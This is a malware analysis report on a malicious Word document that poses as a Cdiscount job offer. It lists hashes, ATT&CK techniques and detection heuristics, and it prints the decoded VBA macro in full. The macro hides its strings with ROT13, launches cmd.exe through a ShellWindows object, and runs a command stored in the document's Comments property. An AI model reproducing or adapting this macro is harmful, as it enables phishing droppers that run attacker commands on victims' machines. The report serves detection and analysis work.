Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 723a5a585456ff80…

MALICIOUS

Office (OLE)

Size: 64.0 KB
Created: 2018-07-24 12:04:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 6fc7380ea7cc07c2b4a268f2662ed3e8
SHA-1: 7293b4bc9eeef8ecf5bd04cd7704f9d96bbf9ed5
SHA-256: 723a5a585456ff80549f8f3e290a89c4f51676c2af3d02821c760a98eb73ddbe
Risk Score: 102

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros that use ShellExecute to launch a second-stage payload. The macro stores the executable name in obfuscated form as 'pzq.rkr' and passes a suspicious, likewise obfuscated argument to GetObject. The document body presents a job offer to lure the user into interacting with the malicious content.

Heuristics (4)

  • Reference to ShellExecute API (severity: high, rule: SC_STR_SHELLEXEC)
    Reference to ShellExecute API
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • GetObject call (severity: high, rule: OLE_VBA_GETOBJ)
    GetObject call
    Matched lines in script:
      Function yolo()
          Set obj = GetObject(A("arj:P08NSQ90-S2N1-11Q1-8455-00N0P91S3880"))
          obj.Document.Application.ShellExecute A("pzq.rkr"), A(ActiveDocument.BuiltInDocumentProperties(A("Pbzzragf"))), "c:\windows\system32", Null, 0
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found in document text (OLE body):
      • http://schemas.openxmlformats.org/officeDocument/2006/bibliography
      • http://schemas.openxmlformats.org/officeDocument/2006/customXml
      • http://schemas.openxmlformats.org/drawingml/2006/main

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2255 bytes
SHA-256: c69b280aeca38bad7163e1d2953f26541110919ee8224bfba1952936d4a54803

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 1, MSForms, CommandButton"

Function A(Test$) As String
  Dim tt As Long, x As Integer, y As Integer
  For tt = 1 To Len(Test$)
    y% = 0
    x% = Asc(Mid$(Test$, tt, 1))
    If (x% > 64 And x% < 91) Or (x% > 96 And x% < 123) Then
      y% = 13
      x% = x% - y%
      If x% < 97 And x% > 83 Then x% = x% + 26 Else If x% < 65 Then x% = x% + 26
    End If
    Mid$(Test$, tt, 1) = Chr$(x%)
  Next tt
  A = Test$
End Function

Function yolo()
    Set obj = GetObject(A("arj:P08NSQ90-S2N1-11Q1-8455-00N0P91S3880"))
    obj.Document.Application.ShellExecute A("pzq.rkr"), A(ActiveDocument.BuiltInDocumentProperties(A("Pbzzragf"))), "c:\windows\system32", Null, 0
    ActiveDocument.BuiltInDocumentProperties("category") = "1"
End Function

Private Sub CommandButton1_Click()
    If ActiveDocument.BuiltInDocumentProperties("category") = "0" Then
        yolo
    End If
    Selection.ParagraphFormat.Alignment = wdAlignParagraphLeft
    Selection.Font.Size = 11
    Selection.TypeText Text:="Vous l'aurez peut-être découvert, mais il s'agit de Cdiscount. Le poste est disponible à Bordeaux ou Paris. Selon profile le télétravail est possible avec déplacement occasionnel dans les locaux (à minima 2 jours par quinzaine)."
    Selection.TypeParagraph
    Selection.TypeText Text:="En plus du salaire très attractif, vous bénéficierez d'une excellente mutuelle, d'une crèche d'entreprise et de tarifs préférentiels sur l'ensemble des plateformes Cdiscount."
    Selection.TypeParagraph
    Selection.Font.Bold = True
    Selection.ParagraphFormat.Alignment = 1
    Selection.TypeText Text:="Cdiscount est bien + que vous ne le croyez : venez grandir avec nos équipes d'experts, cultiver votre talent et révolutionner le e-commerce tout en partageant les valeurs qui font notre force !"
    ActiveDocument.Shapes("Picture 1").Select
    Selection.ShapeRange.Delete
End Sub